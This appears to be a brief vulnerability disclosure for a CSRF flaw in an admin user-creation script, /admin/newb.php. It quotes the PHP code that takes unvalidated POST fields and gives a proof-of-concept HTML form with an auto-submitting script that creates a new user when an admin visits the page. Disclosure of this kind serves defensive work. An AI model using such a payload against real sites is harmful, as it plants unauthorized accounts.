CSRF Vulnerability in /admin/newb.php

[ghost]

/admin/newb.php $username = $_POST['username']; $email = $_POST['email']; $password = $_POST['password'];

Obviously it does not implement a CSRF token, which makes it possible that a new user could be created once the admin visits the following web page

<form action="http://allendiskdemo.com/admin/newb.php" method="POST"> <input type=text name=username value=newuser> <input type=text name=password value=passw0rd> <input type=text name=email value=newuser@new.com> </form> <script>document.form[0].submit()</script>